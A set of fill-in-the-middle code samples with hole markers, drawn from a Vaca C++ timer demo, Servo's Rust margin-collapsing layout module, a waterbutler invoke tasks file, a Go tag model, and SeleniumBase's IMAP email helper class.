<|file_name|>Timers.cpp<|end_file_name|><|fim▁begin|>// Vaca - Visual Application Components Abstraction // Copyright (c) 2005-2009 David Capello // // This file is distributed under the terms of the MIT license, // please read LICENSE.txt for more information. #include <vaca/vaca.h> #include "../resource.h" using namespace vaca; class TimerViewer : public Widget { Timer m_timer; bool m_on; public: TimerViewer(int msecs, Color color, Widget* parent) : Widget(parent) , m_timer(msecs) , m_on(false) { setBgColor(color); setPreferredSize(Size(64, 64)); m_timer.Tick.connect(&TimerViewer::onTick, this); m_timer.start(); } <|fim▁hole|> virtual void onPaint(PaintEvent& ev) { Graphics& g = ev.getGraphics(); Rect rc = getClientBounds(); Color bg = getBgColor(); Pen blackPen(Color::Black); Brush foreBrush(m_on ? getBgColor()+Color(200, 200, 200): getBgColor()); g.drawRect(blackPen, rc); rc.shrink(1); g.fillRect(foreBrush, rc); } private: void onTick() { // switch state m_on = !m_on; invalidate(true); } }; // the main window class MainFrame : public Frame { Label m_label1; Label m_label2; Label m_label3; TimerViewer m_timer1; TimerViewer m_timer2; TimerViewer m_timer3; public: MainFrame() : Frame(L"Timers", NULL, Frame::Styles::Default - Frame::Styles::Resizable - Frame::Styles::Maximizable) , m_label1(L"1 sec", this) , m_label2(L"2 sec", this) , m_label3(L"4 sec", this) , m_timer1(1000, Color::Red, this) , m_timer2(2000, Color(0, 128, 0), this) , m_timer3(4000, Color::Blue, this) { setLayout(Bix::parse(L"XY[%,%,%;%,%,%]", &m_label1, &m_label2, &m_label3, &m_timer1, &m_timer2, &m_timer3)); setSize(getPreferredSize()); } }; int VACA_MAIN() { Application app; MainFrame frm; frm.setIcon(ResourceId(IDI_VACA)); frm.setVisible(true); app.run(); return 0; }<|fim▁end|>
protected:
<|file_name|>model.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ //! Borders, padding, and margins. #![deny(unsafe_code)] use fragment::Fragment; use geom::{Matrix2D, SideOffsets2D, Size2D}; use std::cmp::{max, min}; use std::fmt; use style::computed_values::transform::ComputedMatrix; use style::properties::ComputedValues; use style::values::computed::{LengthAndPercentage, LengthOrPercentageOrAuto}; use style::values::computed::{LengthOrPercentageOrNone, LengthOrPercentage}; use util::geometry::Au; use util::logical_geometry::LogicalMargin; /// A collapsible margin. See CSS 2.1 § 8.3.1. #[derive(Copy)] pub struct AdjoiningMargins { /// The value of the greatest positive margin. pub most_positive: Au, /// The actual value (not the absolute value) of the negative margin with the largest absolute /// value. Since this is not the absolute value, this is always zero or negative. pub most_negative: Au, } impl AdjoiningMargins { pub fn new() -> AdjoiningMargins { AdjoiningMargins { most_positive: Au(0), most_negative: Au(0), } } pub fn from_margin(margin_value: Au) -> AdjoiningMargins { if margin_value >= Au(0) { AdjoiningMargins { most_positive: margin_value, most_negative: Au(0), } } else { AdjoiningMargins { most_positive: Au(0), most_negative: margin_value, } } } pub fn union(&mut self, other: AdjoiningMargins) { self.most_positive = max(self.most_positive, other.most_positive); self.most_negative = min(self.most_negative, other.most_negative) } pub fn collapse(&self) -> Au { self.most_positive + self.most_negative } } /// Represents the block-start and block-end margins of a flow with collapsible margins. See CSS 2.1 § 8.3.1. #[derive(Copy)] pub enum CollapsibleMargins { /// Margins may not collapse with this flow. None(Au, Au), /// Both the block-start and block-end margins (specified here in that order) may collapse, but the /// margins do not collapse through this flow. Collapse(AdjoiningMargins, AdjoiningMargins), /// Margins collapse *through* this flow. This means, essentially, that the flow doesn’t /// have any border, padding, or out-of-flow (floating or positioned) content CollapseThrough(AdjoiningMargins), } impl CollapsibleMargins { pub fn new() -> CollapsibleMargins { CollapsibleMargins::None(Au(0), Au(0)) } /// Returns the amount of margin that should be applied in a noncollapsible context. This is /// currently used to apply block-start margin for hypothetical boxes, since we do not collapse /// margins of hypothetical boxes. pub fn block_start_margin_for_noncollapsible_context(&self) -> Au { match *self { CollapsibleMargins::None(block_start, _) => block_start, CollapsibleMargins::Collapse(ref block_start, _) | CollapsibleMargins::CollapseThrough(ref block_start) => block_start.collapse(), } } } enum FinalMarginState { MarginsCollapseThrough, BottomMarginCollapses, } pub struct MarginCollapseInfo { pub state: MarginCollapseState, pub block_start_margin: AdjoiningMargins, pub margin_in: AdjoiningMargins, } impl MarginCollapseInfo { /// TODO(#2012, pcwalton): Remove this method once `fragment` is not an `Option`. pub fn new() -> MarginCollapseInfo { MarginCollapseInfo { state: MarginCollapseState::AccumulatingCollapsibleTopMargin, block_start_margin: AdjoiningMargins::new(), margin_in: AdjoiningMargins::new(), } } pub fn initialize_block_start_margin(&mut self, fragment: &Fragment, can_collapse_block_start_margin_with_kids: bool) { if !can_collapse_block_start_margin_with_kids { self.state = MarginCollapseState::AccumulatingMarginIn } self.block_start_margin = AdjoiningMargins::from_margin(fragment.margin.block_start) } pub fn finish_and_compute_collapsible_margins(mut self, fragment: &Fragment, can_collapse_block_end_margin_with_kids: bool) -> (CollapsibleMargins, Au) { let state = match self.state { MarginCollapseState::AccumulatingCollapsibleTopMargin => { match fragment.style().content_block_size() { LengthOrPercentageOrAuto::Auto | LengthOrPercentageOrAuto::Length(Au(0)) | LengthOrPercentageOrAuto::Percentage(0.) => { match fragment.style().min_block_size() { LengthOrPercentage::Length(Au(0)) | LengthOrPercentage::Percentage(0.) => { FinalMarginState::MarginsCollapseThrough }, _ => { // If the fragment has non-zero min-block-size, margins may not // collapse through it. FinalMarginState::BottomMarginCollapses } } }, _ => { // If the fragment has an explicitly specified block-size, margins may not // collapse through it. FinalMarginState::BottomMarginCollapses } } } MarginCollapseState::AccumulatingMarginIn => FinalMarginState::BottomMarginCollapses, }; // Different logic is needed here depending on whether this flow can collapse its block-end // margin with its children. let block_end_margin = fragment.margin.block_end; if !can_collapse_block_end_margin_with_kids { match state { FinalMarginState::MarginsCollapseThrough => { let advance = self.block_start_margin.collapse(); self.margin_in.union(AdjoiningMargins::from_margin(block_end_margin)); (CollapsibleMargins::Collapse(self.block_start_margin, self.margin_in), advance) } FinalMarginState::BottomMarginCollapses => { let advance = self.margin_in.collapse(); self.margin_in.union(AdjoiningMargins::from_margin(block_end_margin)); (CollapsibleMargins::Collapse(self.block_start_margin, self.margin_in), advance) } } } else { match state { FinalMarginState::MarginsCollapseThrough => { self.block_start_margin.union(AdjoiningMargins::from_margin(block_end_margin)); (CollapsibleMargins::CollapseThrough(self.block_start_margin), Au(0)) } FinalMarginState::BottomMarginCollapses => { self.margin_in.union(AdjoiningMargins::from_margin(block_end_margin)); (CollapsibleMargins::Collapse(self.block_start_margin, self.margin_in), Au(0)) } } } } pub fn current_float_ceiling(&mut self) -> Au { match self.state { MarginCollapseState::AccumulatingCollapsibleTopMargin => { // We do not include the top margin in the float ceiling, because the float flow // needs to be positioned relative to our *border box*, not our margin box. See // `tests/ref/float_under_top_margin_a.html`. Au(0) } MarginCollapseState::AccumulatingMarginIn => self.margin_in.collapse(), } } /// Adds the child's potentially collapsible block-start margin to the current margin state and /// advances the Y offset by the appropriate amount to handle that margin. Returns the amount /// that should be added to the Y offset during block layout. pub fn advance_block_start_margin(&mut self, child_collapsible_margins: &CollapsibleMargins) -> Au { match (self.state, *child_collapsible_margins) { (MarginCollapseState::AccumulatingCollapsibleTopMargin, CollapsibleMargins::None(block_start, _)) => { self.state = MarginCollapseState::AccumulatingMarginIn; block_start } (MarginCollapseState::AccumulatingCollapsibleTopMargin, CollapsibleMargins::Collapse(block_start, _)) => { self.block_start_margin.union(block_start); self.state = MarginCollapseState::AccumulatingMarginIn; Au(0) } (MarginCollapseState::AccumulatingMarginIn, CollapsibleMargins::None(block_start, _)) => { let previous_margin_value = self.margin_in.collapse(); self.margin_in = AdjoiningMargins::new(); previous_margin_value + block_start } (MarginCollapseState::AccumulatingMarginIn, CollapsibleMargins::Collapse(block_start, _)) => { self.margin_in.union(block_start); let margin_value = self.margin_in.collapse(); self.margin_in = AdjoiningMargins::new(); margin_value } (_, CollapsibleMargins::CollapseThrough(_)) => { // For now, we ignore this; this will be handled by `advance_block-end_margin` below. Au(0) } } } /// Adds the child's potentially collapsible block-end margin to the current margin state and /// advances the Y offset by the appropriate amount to handle that margin. Returns the amount /// that should be added to the Y offset during block layout. pub fn advance_block_end_margin(&mut self, child_collapsible_margins: &CollapsibleMargins) -> Au { match (self.state, *child_collapsible_margins) { (MarginCollapseState::AccumulatingCollapsibleTopMargin, CollapsibleMargins::None(..)) | (MarginCollapseState::AccumulatingCollapsibleTopMargin, CollapsibleMargins::Collapse(..)) => { // Can't happen because the state will have been replaced with // `MarginCollapseState::AccumulatingMarginIn` above. panic!("should not be accumulating collapsible block_start margins anymore!") } (MarginCollapseState::AccumulatingCollapsibleTopMargin, CollapsibleMargins::CollapseThrough(margin)) => { self.block_start_margin.union(margin); Au(0) } (MarginCollapseState::AccumulatingMarginIn, CollapsibleMargins::None(_, block_end)) => { assert_eq!(self.margin_in.most_positive, Au(0)); assert_eq!(self.margin_in.most_negative, Au(0)); block_end } (MarginCollapseState::AccumulatingMarginIn, CollapsibleMargins::Collapse(_, block_end)) | (MarginCollapseState::AccumulatingMarginIn, CollapsibleMargins::CollapseThrough(block_end)) => { self.margin_in.union(block_end); Au(0) } } } } #[derive(Copy)] pub enum MarginCollapseState { AccumulatingCollapsibleTopMargin, AccumulatingMarginIn, } /// Intrinsic inline-sizes, which consist of minimum and preferred. #[derive(RustcEncodable)] pub struct IntrinsicISizes { /// The *minimum inline-size* of the content. pub minimum_inline_size: Au, /// The *preferred inline-size* of the content. pub preferred_inline_size: Au, } impl fmt::Debug for IntrinsicISizes { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "min={:?}, pref={:?}", self.minimum_inline_size, self.preferred_inline_size) } } impl IntrinsicISizes { pub fn new() -> IntrinsicISizes { IntrinsicISizes { minimum_inline_size: Au(0), preferred_inline_size: Au(0), } } } /// The temporary result of the computation of intrinsic inline-sizes. pub struct IntrinsicISizesContribution { /// Intrinsic sizes for the content only (not counting borders, padding, or margins). pub content_intrinsic_sizes: IntrinsicISizes, /// The inline size of borders and padding, as well as margins if appropriate. pub surrounding_size: Au, } impl IntrinsicISizesContribution { /// Creates and initializes an inline size computation with all sizes set to zero. pub fn new() -> IntrinsicISizesContribution { IntrinsicISizesContribution { content_intrinsic_sizes: IntrinsicISizes::new(), surrounding_size: Au(0), } } /// Adds the content intrinsic sizes and the surrounding size together to yield the final /// intrinsic size computation. pub fn finish(self) -> IntrinsicISizes { IntrinsicISizes { minimum_inline_size: self.content_intrinsic_sizes.minimum_inline_size + self.surrounding_size, preferred_inline_size: self.content_intrinsic_sizes.preferred_inline_size + self.surrounding_size, } } /// Updates the computation so that the minimum is the maximum of the current minimum and the /// given minimum and the preferred is the sum of the current preferred and the given /// preferred. This is used when laying out fragments in the inline direction. /// /// FIXME(pcwalton): This is incorrect when the inline fragment contains forced line breaks /// (e.g. `<br>` or `white-space: pre`). pub fn union_inline(&mut self, sizes: &IntrinsicISizes) { self.content_intrinsic_sizes.minimum_inline_size = max(self.content_intrinsic_sizes.minimum_inline_size, sizes.minimum_inline_size); self.content_intrinsic_sizes.preferred_inline_size = self.content_intrinsic_sizes.preferred_inline_size + sizes.preferred_inline_size } /// Updates the computation so that the minimum is the sum of the current minimum and the /// given minimum and the preferred is the sum of the current preferred and the given /// preferred. This is used when laying out fragments in the inline direction when /// `white-space` is `pre` or `nowrap`. pub fn union_nonbreaking_inline(&mut self, sizes: &IntrinsicISizes) { self.content_intrinsic_sizes.minimum_inline_size = self.content_intrinsic_sizes.minimum_inline_size + sizes.minimum_inline_size; self.content_intrinsic_sizes.preferred_inline_size = self.content_intrinsic_sizes.preferred_inline_size + sizes.preferred_inline_size } /// Updates the computation so that the minimum is the maximum of the current minimum and the /// given minimum and the preferred is the maximum of the current preferred and the given /// preferred. This can be useful when laying out fragments in the block direction (but note /// that it does not take floats into account, so `BlockFlow` does not use it). /// /// This is used when contributing the intrinsic sizes for individual fragments. pub fn union_block(&mut self, sizes: &IntrinsicISizes) { self.content_intrinsic_sizes.minimum_inline_size = max(self.content_intrinsic_sizes.minimum_inline_size, sizes.minimum_inline_size); self.content_intrinsic_sizes.preferred_inline_size = max(self.content_intrinsic_sizes.preferred_inline_size, sizes.preferred_inline_size) } } /// Useful helper data type when computing values for blocks and positioned elements. #[derive(Copy, PartialEq, Debug)] pub enum MaybeAuto { Auto, Specified(Au), } impl MaybeAuto { #[inline] pub fn from_style(length: LengthOrPercentageOrAuto, containing_length: Au) -> MaybeAuto { match length { LengthOrPercentageOrAuto::Auto => MaybeAuto::Auto, LengthOrPercentageOrAuto::Percentage(percent) => { MaybeAuto::Specified(containing_length.scale_by(percent)) } LengthOrPercentageOrAuto::Length(length) => MaybeAuto::Specified(length) } } #[inline] pub fn specified_or_default(&self, default: Au) -> Au { match *self { MaybeAuto::Auto => default, MaybeAuto::Specified(value) => value, } } #[inline] pub fn specified_or_zero(&self) -> Au { self.specified_or_default(Au::new(0)) } #[inline] pub fn map<F>(&self, mapper: F) -> MaybeAuto where F: FnOnce(Au) -> Au { match *self { MaybeAuto::Auto => MaybeAuto::Auto, MaybeAuto::Specified(value) => MaybeAuto::Specified(mapper(value)), } } } pub fn specified_or_none(length: LengthOrPercentageOrNone, containing_length: Au) -> Option<Au> { match length { LengthOrPercentageOrNone::None => None, LengthOrPercentageOrNone::Percentage(percent) => Some(containing_length.scale_by(percent)), LengthOrPercentageOrNone::Length(length) => Some(length),<|fim▁hole|> match length { LengthOrPercentage::Length(length) => length, LengthOrPercentage::Percentage(p) => containing_length.scale_by(p) } } #[inline] pub fn padding_from_style(style: &ComputedValues, containing_block_inline_size: Au) -> LogicalMargin<Au> { let padding_style = style.get_padding(); LogicalMargin::from_physical(style.writing_mode, SideOffsets2D::new( specified(padding_style.padding_top, containing_block_inline_size), specified(padding_style.padding_right, containing_block_inline_size), specified(padding_style.padding_bottom, containing_block_inline_size), specified(padding_style.padding_left, containing_block_inline_size))) } pub trait ToGfxMatrix { fn to_gfx_matrix(&self, containing_size: &Size2D<Au>) -> Matrix2D<f32>; } impl ToGfxMatrix for ComputedMatrix { fn to_gfx_matrix(&self, containing_size: &Size2D<Au>) -> Matrix2D<f32> { Matrix2D::new(self.m11 as f32, self.m12 as f32, self.m21 as f32, self.m22 as f32, self.m31.to_au(containing_size.width).to_subpx() as f32, self.m32.to_au(containing_size.height).to_subpx() as f32) } } trait ToAu { fn to_au(&self, containing_size: Au) -> Au; } impl ToAu for LengthAndPercentage { #[inline] fn to_au(&self, containing_size: Au) -> Au { self.length + Au::from_frac_px(self.percentage * containing_size.to_subpx()) } }<|fim▁end|>
} } pub fn specified(length: LengthOrPercentage, containing_length: Au) -> Au {
<|file_name|>tasks.py<|end_file_name|><|fim▁begin|>import os from invoke import task WHEELHOUSE_PATH = os.environ.get('WHEELHOUSE') def monkey_patch(ctx): # Force an older cacert.pem from certifi v2015.4.28, prevents an ssl failure w/ identity.api.rackspacecloud.com. # # SubjectAltNameWarning: Certificate for identity.api.rackspacecloud.com has no `subjectAltName`, falling # back to check for a `commonName` for now. This feature is being removed by major browsers and deprecated by # RFC 2818. (See https://github.com/shazow/urllib3/issues/497 for details.) # SubjectAltNameWarning import ssl import certifi _create_default_context = ssl.create_default_context def create_default_context(purpose=ssl.Purpose.SERVER_AUTH, *, cafile=None, capath=None, cadata=None): if cafile is None: cafile = certifi.where() return _create_default_context(purpose=purpose, cafile=cafile, capath=capath, cadata=cadata) ssl.create_default_context = create_default_context @task def wheelhouse(ctx, develop=False, pty=True): req_file = 'dev-requirements.txt' if develop else 'requirements.txt' cmd = 'pip wheel --find-links={} -r {} --wheel-dir={}'.format(WHEELHOUSE_PATH, req_file, WHEELHOUSE_PATH) ctx.run(cmd, pty=pty) @task def install(ctx, develop=False, pty=True): ctx.run('python setup.py develop') req_file = 'dev-requirements.txt' if develop else 'requirements.txt' cmd = 'pip install --upgrade -r {}'.format(req_file) if WHEELHOUSE_PATH: cmd += ' --no-index --find-links={}'.format(WHEELHOUSE_PATH) ctx.run(cmd, pty=pty) @task def flake(ctx): """ Run style and syntax checker. Follows options defined in setup.cfg """ ctx.run('flake8 .', pty=True) @task def mypy(ctx): """ Check python types using mypy (additional level of linting). Follows options defined in setup.cfg """ ctx.run('mypy waterbutler/', pty=True)<|fim▁hole|> flake(ctx) if types: mypy(ctx) cmd = 'py.test --cov-report term-missing --cov waterbutler tests' if verbose: cmd += ' -v' ctx.run(cmd, pty=True) @task def celery(ctx, loglevel='INFO', hostname='%h'): monkey_patch(ctx) from waterbutler.tasks.app import app command = ['worker'] if loglevel: command.extend(['--loglevel', loglevel]) if hostname: command.extend(['--hostname', hostname]) app.worker_main(command) @task def rabbitmq(ctx): ctx.run('rabbitmq-server', pty=True) @task def server(ctx): monkey_patch(ctx) if os.environ.get('REMOTE_DEBUG', None): import pydevd # e.g. '127.0.0.1:5678' remote_parts = os.environ.get('REMOTE_DEBUG').split(':') pydevd.settrace(remote_parts[0], port=int(remote_parts[1]), suspend=False, stdoutToServer=True, stderrToServer=True) from waterbutler.server.app import serve serve() @task def clean(ctx, verbose=False): cmd = 'find . -name "*.pyc" -delete' if verbose: print(cmd) ctx.run(cmd, pty=True)<|fim▁end|>
@task def test(ctx, verbose=False, types=False):
<|file_name|>tag.go<|end_file_name|><|fim▁begin|>package model const ( // TypeUser . TypeUser = int32(0) // 普通tag // TypeUser tag type // TypeUpper . TypeUpper = int32(1) // up主tag // TypeOfficailCategory . TypeOfficailCategory = int32(2) // 官方-分类tag // TypeOfficailContent . TypeOfficailContent = int32(3) // 官方-内容tag // TypeOfficailActivity . TypeOfficailActivity = int32(4) // 官方-活动tag // TagStateNormal . TagStateNormal = int32(0) // tag state // TagStateDelete . TagStateDelete = int32(1) // TagStateHide . TagStateHide = int32(2) // AttrNo . AttrNo = int32(0) // attr // AttrYes . AttrYes = int32(1) // SpamActionAdd . SpamActionAdd = int32(1) // spam // SpamActionDel . SpamActionDel = int32(2)<|fim▁hole|> TnameMaxLen = 32 // MaxSubNum MaxSubNum. MaxSubNum = 400 // UserBannedNone . UserBannedNone = int32(0) // ChannelMaxGroups channel max groups num. ChannelMaxGroups = int32(8) ) // Detail . type Detail struct { Info *Tag `json:"info"` Similar []*TagSimilar `json:"similar"` } // Filter . type Filter struct { Level int `json:"level"` Msg string `json:"msg"` } // Synonym . type Synonym struct { Parent int64 `json:"parent"` Childs []int64 `json:"childs"` } // HotTags . type HotTags struct { Rid int64 `json:"rid"` Tags []*HotTag `json:"tags"` } // HotTag . type HotTag struct { Rid int64 `json:"-"` Tid int64 `json:"tid"` Tname string `json:"tname"` HighLight int64 `json:"highlight"` IsAtten int8 `json:"is_atten"` } // UploadTag . type UploadTag struct { Rid int64 `json:"rid"` Tid int64 `json:"tid"` Tname string `json:"tname"` Rank int64 `json:"rank"` IsBusiness int8 `json:"-"` }<|fim▁end|>
// TnameMaxLen .
<|file_name|>email_manager.py<|end_file_name|><|fim▁begin|>""" EmailManager - a helper class to login, search for, and delete emails. """ import email import htmlentitydefs import imaplib import quopri import re import time import types from seleniumbase.config import settings class EmailManager: """ A helper class to interface with an Email account. These imap methods can search for and fetch messages without needing a browser. Example: em = EmailManager() result = em.check_for_recipient( "[GMAIL.USER]+[SOME CODE OR TIMESTAMP KEY]@gmail.com") """ HTML = "text/html" PLAIN = "text/plain" TIMEOUT = 1800 def __init__(self, uname=settings.EMAIL_USERNAME, pwd=settings.EMAIL_PASSWORD, imap_string=settings.EMAIL_IMAP_STRING, port=settings.EMAIL_IMAP_PORT): self.uname = uname self.pwd = pwd self.imap_string = imap_string self.port = port def imap_connect(self): """ Connect to the IMAP mailbox. """ self.mailbox = imaplib.IMAP4_SSL(self.imap_string, self.port) self.mailbox.login(self.uname, self.pwd) self.mailbox.select() def imap_disconnect(self): """ Disconnect from the IMAP mailbox. """ self.mailbox.close() self.mailbox.logout() def __imap_search(self, ** criteria_dict): """ Searches for query in the given IMAP criteria and returns the message numbers that match as a list of strings. Criteria without values (eg DELETED) should be keyword args with KEY=True, or else not passed. Criteria with values should be keyword args of the form KEY="VALUE" where KEY is a valid IMAP key. IMAP default is to AND all criteria together. We don't support other logic quite yet. All valid keys: ALL, ANSWERED, BCC <string>, BEFORE <string>, BODY <string>, CC <string>, DELETED, DRAFT, FLAGGED, FROM <string>, HEADER <field-name> <string> (UNTESTED), KEYWORD <flag>, LARGER <n>, NEW, NOT <search-key>, OLD, ON <date>, OR <search-key1> <search-key2> (UNTESTED), RECENT, SEEN, SENTBEFORE <date>, SENTON <date>, SENTSINCE <date>, SINCE <date>, SMALLER <n>, SUBJECT <string>, TEXT <string>, TO <string>, UID <sequence set>, UNANSWERED, UNDELETED, UNDRAFT, UNFLAGGED, UNKEYWORD <flag>, UNSEEN. For details on keys and their values, see http://tools.ietf.org/html/rfc3501#section-6.4.4 :param criteria_dict: dictionary of search criteria keywords :raises: EmailException if something in IMAP breaks :returns: List of message numbers as strings matched by given criteria """ self.imap_connect() criteria = [] for key in criteria_dict: if criteria_dict[key] is True: criteria.append('(%s)' % key) else: criteria.append('(%s "%s")' % (key, criteria_dict[key])) # If any of these criteria are not valid IMAP keys, IMAP will tell us. status, msg_nums = self.mailbox.search('UTF-8', * criteria) self.imap_disconnect() if 0 == len(msg_nums): msg_nums = [] if 'OK' in status: return self.__parse_imap_search_result(msg_nums) else: raise EmailException("IMAP status is " + str(status)) def remove_formatting(self, html): """ Clean out any whitespace @Params html - String of html to remove whitespace from @Returns Cleaned string """ return ' '.join(html.split()) def __parse_imap_search_result(self, result): """ This takes the result of imap_search and returns SANE results @Params result - result from an imap_search call @Returns List of IMAP search results """ if isinstance(result, types.ListType): # Above is same as "type(result) == types.ListType" if len(result) == 1: return self.__parse_imap_search_result(result[0]) else: return result elif isinstance(result, types.StringType): # Above is same as "type(result) == types.StringType" return result.split() else: # Fail silently assuming tests will fail if emails are not found return [] def fetch_html(self, msg_nums): """ Given a message number that we found with imap_search, get the text/html content. @Params msg_nums - message number to get html message for @Returns HTML content of message matched by message number """ if not msg_nums: raise Exception("Invalid Message Number!") return self.__imap_fetch_content_type(msg_nums, self.HTML) def fetch_plaintext(self, msg_nums): """ Given a message number that we found with imap_search, get the text/plain content. @Params msg_nums - message number to get message for @Returns Plaintext content of message matched by message number """ if not msg_nums: raise Exception("Invalid Message Number!") return self.__imap_fetch_content_type(msg_nums, self.PLAIN) def __imap_fetch_content_type(self, msg_nums, content_type): """ Given a message number that we found with imap_search, fetch the whole source, dump that into an email object, and pick out the part that matches the content type specified. Return that, if we got multiple emails, return dict of all the parts. @Params msg_nums - message number to search for content_type - content type of email message to return @Returns Specified content type string or dict of all content types of matched email. """ if not msg_nums: raise Exception("Invalid Message Number!") if not content_type: raise Exception("Need a content type!") contents = {} self.imap_connect() for num in msg_nums: status, data = self.mailbox.fetch(num, "(RFC822)") for response_part in data: if isinstance(response_part, tuple): msg = email.message_from_string(response_part[1]) for part in msg.walk(): if str(part.get_content_type()) == content_type: content = str(part.get_payload(decode=True)) contents[int(num)] = content self.imap_disconnect() return contents def fetch_html_by_subject(self, email_name): """ Get the html of an email, searching by subject. @Params email_name - the subject to search for @Returns HTML content of the matched email """ if not email_name: raise EmailException("Subject cannot be null") results = self.__imap_search(SUBJECT=email_name) sources = self.fetch_html(results) return sources def fetch_plaintext_by_subject(self, email_name): """ Get the plain text of an email, searching by subject. @Params email_name - the subject to search for @Returns Plaintext content of the matched email """ if not email_name: raise EmailException("Subject cannot be null") results = self.__imap_search(SUBJECT=email_name) sources = self.fetch_plaintext(results) return sources def search_for_recipient(self, email, timeout=None, content_type=None): """ Get content of emails, sent to a specific email address. @Params email - the recipient email address to search for timeout - seconds to try beore timing out content_type - type of email string to return @Returns Content of the matched email in the given content type """ return self.search(timeout=timeout, content_type=content_type, TO=email) def search_for_subject(self, subject, timeout=None, content_type=None): """ Get content of emails, sent to a specific email address. @Params email - the recipient email address to search for timeout - seconds to try beore timing out content_type - type of email string to return @Returns Content of the matched email in the given content type """ return self.search(timeout=timeout, content_type=content_type, SUBJECT=subject) def search_for_count(self, ** args): """ A search that keeps searching up until timeout for a specific number of matches to a search. If timeout is not specified we use the default. If count= is not specified we will fail. Return values are the same as search(), except for count=0, where we will return an empty list. Use this if you need to wait for a number of emails other than 1. @Params args - dict of arguments to use in search: count - number of emails to search for timeout - seconds to try search before timing out @Returns List of message numbers matched by search """ if "timeout" not in args.keys(): timeout = self.TIMEOUT elif args["timeout"]: timeout = args["timeout"] args["timeout"] = timeout / 15 if "count" not in args.keys(): raise EmailException("Count param not defined!") else: count = int(args["count"]) del args["count"] results = None timer = timeout count = 0 while count < timer: try: results = self.search(** args) except EmailException: if count == 0: return [] if results and len(results) == count: return results else: time.sleep(15) count += 15 if count >= timer: raise EmailException("Failed to match criteria %s in %s minutes" % (args, timeout / 60)) def __check_msg_for_headers(self, msg, ** email_headers): """ Checks an Email.Message object for the headers in email_headers. Following are acceptable header names: ['Delivered-To', 'Received', 'Return-Path', 'Received-SPF', 'Authentication-Results', 'DKIM-Signature', 'DomainKey-Signature', 'From', 'To', 'Message-ID', 'Subject', 'MIME-Version', 'Content-Type', 'Date', 'X-Sendgrid-EID', 'Sender']. @Params msg - the Email.message object to check email_headers - list of headers to check against @Returns Boolean whether all the headers were found """ all_headers_found = False email_headers['Delivered-To'] = email_headers['To'] email_headers.pop('To') all_headers_found = all(k in msg.keys() for k in email_headers) return all_headers_found def fetch_message(self, msgnum): """ Given a message number, return the Email.Message object. @Params msgnum - message number to find @Returns Email.Message object for the given message number """ self.imap_connect() status, data = self.mailbox.fetch(msgnum, "(RFC822)") self.imap_disconnect() for response_part in data: if isinstance(response_part, tuple): return email.message_from_string(response_part[1]) def get_content_type(self, msg, content_type="HTML"): """ Given an Email.Message object, gets the content-type payload as specified by @content_type. This is the actual body of the email. @Params msg - Email.Message object to get message content for content_type - Type of content to get from the email @Return String content of the email in the given type """ if "HTML" in content_type.upper(): content_type = self.HTML elif "PLAIN" in content_type.upper(): content_type = self.PLAIN for part in msg.walk(): if str(part.get_content_type()) == content_type: return str(part.get_payload(decode=True)) def search(self, ** args): """ Checks email inbox every 15 seconds that match the criteria up until timeout. Search criteria should be keyword args eg TO="[email protected]". See __imap_search docstring for list of valid criteria. If content_type is not defined, will return a list of msg numbers. Options: - fetch: will return a dict of Message objects, keyed on msgnum, which can be used to look at headers and other parts of the complete message. (http://docs.python.org/library/email.message.html) - timeout: will replace the default module timeout with the value in SECONDS. - content_type: should be either "PLAIN" or "HTML". If defined returns the source of the matched messages as a dict of msgnum:content. If not defined we return a list of msg nums. """ if "content_type" not in args.keys(): content_type = None elif "HTML" in args["content_type"]: content_type = self.HTML del args["content_type"] elif "PLAIN" in args["content_type"]: content_type = self.PLAIN del args["content_type"] elif args["content_type"]: content_type = args['content_type'] del args["content_type"] if "timeout" not in args.keys(): timeout = self.TIMEOUT elif "timeout" in args: timeout = args["timeout"] del args["timeout"] fetch = False if "fetch" in args.keys(): fetch = True del args["fetch"] results = None timer = timeout count = 0 while count < timer: results = self.__imap_search(** args) if len(results) > 0: if fetch: msgs = {} for msgnum in results: msgs[msgnum] = self.fetch_message(msgnum) return msgs elif not content_type: return results else: return self.__imap_fetch_content_type(results, content_type) else: time.sleep(15) count += 15 if count >= timer: raise EmailException( "Failed to find message for criteria %s in %s minutes" % (args, timeout / 60)) def remove_whitespace(self, html): """ Clean whitespace from html @Params html - html source to remove whitespace from @Returns String html without whitespace """ # Does python have a better way to do exactly this? clean_html = html for char in ("\r", "\n", "\t"): clean_html = clean_html.replace(char, "") return clean_html def remove_control_chars(self, html): """ Clean control characters from html @Params html - html source to remove control characters from @Returns String html without control characters """ return self.remove_whitespace(html) def replace_entities(self, html): """ Replace htmlentities with unicode characters @Params html - html source to replace entities in @Returns String html with entities replaced """ def fixup(text): """replace the htmlentities in some text""" text = text.group(0) if text[:2] == "&#": # character reference try: if text[:3] == "&#x": return unichr(int(text[3:-1], 16)) else: return unichr(int(text[2:-1])) except ValueError: pass else: # named entity try: text = unichr(htmlentitydefs.name2codepoint[text[1:-1]]) except KeyError: pass return text # leave as is return re.sub("&#?\w+;", fixup, html) def decode_quoted_printable(self, html): """ Decoding from Quoted-printable, or QP encoding, that uses ASCII 7bit chars to encode 8 bit chars, resulting in =3D to represent '='. Python supports UTF-8 so we decode. Also removes line breaks with '= at the end.' @Params html - html source to decode<|fim▁hole|> @Returns String decoded HTML source """ return self.replace_entities(quopri.decodestring(html)) def html_bleach(self, html): """ Cleanup and get rid of all extraneous stuff for better comparison later. Turns formatted into into a single line string. @Params html - HTML source to clean up @Returns String cleaned up HTML source """ return self.decode_quoted_printable(html) class EmailException(Exception): """Raised when we have an Email-related problem.""" def __init__(self, value): self.parameter = value def __str__(self): return repr(self.parameter)<|fim▁end|>
